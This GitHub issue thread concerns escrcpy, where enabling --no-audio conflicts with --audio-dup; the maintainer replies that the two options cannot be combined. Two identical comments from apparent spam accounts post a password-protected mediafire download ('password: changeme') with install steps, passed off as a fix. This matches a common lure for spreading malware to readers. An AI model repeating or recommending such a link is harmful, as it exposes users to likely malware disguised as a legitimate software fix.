### ISSUE TITLE
打开“禁用音频转发”后开始镜像报错无法启动

### ISSUE THREAD

**Issue by hanuxxx** [viarotel-org/escrcpy#231]
本意是希望手机音频不在电脑上播放，所以打开这个开关，但是报以下错误，关掉后可以启动镜像，但是仍没办法关掉电脑声音
>ERROR: --audio-dup not supported if audio is disabled

此时配置文件如下
```
{
	"history": {
		"wireless": [
			{
				"host": "192.168.6.18"
			}
		]
	},
	"common": {
		"theme": "system",
		"language": "zh-CN",
		"savePath": "C:\\Users\\shm22\\Desktop"
	},
	"scrcpy": {
		"global": {
			"--video-bit-rate": "10M",
			"--no-audio": true,
			"--record-format": "mp4",
			"--keyboard": "sdk"
		},
		"deviceScope": "global",
		"192_168_6_18-5555": {
			"--video-bit-rate": "10M",
			"--audio-dup": true,
			"--record-format": "mp4",
			"--keyboard": "sdk"
		}
	}
}
```

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by viarotel** [comment]
你需要删除 --audio-dup 配置，`禁用音频转发`不能和`保持设备音频`选项共存

**Comment by viarotel** [comment]
`禁用音频转发`后 并不会影响设备的音频播放 所以你不需要 勾选 `保持设备音频`
